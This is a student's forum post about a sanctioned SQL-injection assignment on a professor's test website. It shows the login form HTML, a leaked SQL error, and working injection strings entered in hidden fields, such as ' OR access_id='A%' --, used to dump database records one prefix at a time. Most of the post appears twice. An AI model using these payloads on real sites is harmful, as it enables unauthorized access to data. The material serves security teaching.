I'm taking a computer security class and an assignment is to break into a website the professor set up to get a value assigned to a particular name via SQL injection.
The website has a form with four fields and a submit button: ID, password, number, and code.
The submit button does a post to a .pl script.
Hints the teacher provided:
- The ID field always consists of 16 random capital letters and digits.
- The HTML source code is your friend (I looked through it, nothing seemed terribly helpful.)
- Try to force the application to produce an error message (remember: you are testing for SQL Injection vulnerability) and then use the information in this message to iteratively extract the information you are looking for from the database.
No matter what I enter in the fields, it always gives me things like "invalid number" or "invalid code" or "ID and password don't match a valid user."
I've tried inserting things like -- in every field, I've inserted things like " ' OR TRUE" in all the fields... nothing I can think of produces an actual error from a SQL database or gives me insight into what the fields of the database are.
Here's the HTML source:
We were also provided with a set of valid credentials.
Using those takes you to a second page which prints out your access ID... and has a "Show Information" button. I didn't use the web inspector on this page before, but just now I realized it uses a client side script and hidden fields... maybe if I play around with those they aren't validated like the front page fields are?
Edit: Submitting odd values here doesn't cause it to dump an error message, but it causes the page to not be populated...
2x Edit: Okay, finished my assignment. Inserting "' OR 'A'='A" in one of the hidden fields caused it to hand over a few values from the SQL database that my credentials shouldn't have been capable of obtaining.
3X Edit: Further experimentation (there's a bonus credit section) has yielded an actual SQL error message... inserting "'OR user LIKE '%egg'" in a hidden field produced this:
There is a problem in the statement: select * from credit where token='eyhd782327uhhdsjke982379093723' and access_id='' OR user LIKE '%egg'
4X Edit: Finished my assignment by inserting the following into a hidden field:
' OR access_id='A%' -- (there was a space at the end)
This caused it to list everything in the database with an access_id starting with A. I proceeded with B%, C%, D%, E%, and F% to get every piece of data needed for my assignment.
The website has a form with four fields and a submit button: ID, password, number, and code.
The submit button does a post to a .pl script.
Hints the teacher provided:
- The ID field always consists of 16 random capital letters and digits.
- The HTML source code is your friend (I looked through it, nothing seemed terribly helpful.)
- Try to force the application to produce an error message (remember: you are testing for SQL Injection vulnerability) and then use the information in this message to iteratively extract the information you are looking for from the database.
No matter what I enter in the fields, it always gives me things like "invalid number" or "invalid code" or "ID and password don't match a valid user."
I've tried inserting things like -- in every field, I've inserted things like " ' OR TRUE" in all the fields... nothing I can think of produces an actual error from a SQL database or gives me insight into what the fields of the database are.
Here's the HTML source:
Code:
<html>
<head>
<title>Online Access</title>
</head>
<body>
<form action="loginece.pl" method="post">
<br>
<b> Access ID: </b>
<input type="text" name="access" size="16">
<br>
<b> Password: </b>
<input type="password" name="password" size="10">
<br>
<b> Your Husce number: </b>
<input type="text" name="ece5968" size="3" maxlength="10">
<br>
<b> Your registration code: </b>
<input type="text" name="matnr" size="7" maxlength="7">
<br>
<br>
<input type="submit" name="login" value="Login">
</form>
</body>
</html>We were also provided with a set of valid credentials.
Using those takes you to a second page which prints out your access ID... and has a "Show Information" button. I didn't use the web inspector on this page before, but just now I realized it uses a client side script and hidden fields... maybe if I play around with those they aren't validated like the front page fields are?
Edit: Submitting odd values here doesn't cause it to dump an error message, but it causes the page to not be populated...
2x Edit: Okay, finished my assignment. Inserting "' OR 'A'='A" in one of the hidden fields caused it to hand over a few values from the SQL database that my credentials shouldn't have been capable of obtaining.
3X Edit: Further experimentation (there's a bonus credit section) has yielded an actual SQL error message... inserting "'OR user LIKE '%egg'" in a hidden field produced this:
There is a problem in the statement: select * from credit where token='eyhd782327uhhdsjke982379093723' and access_id='' OR user LIKE '%egg'
4X Edit: Finished my assignment by inserting the following into a hidden field:
' OR access_id='A%' -- (there was a space at the end)
This caused it to list everything in the database with an access_id starting with A. I proceeded with B%, C%, D%, E%, and F% to get every piece of data needed for my assignment.
Last edited: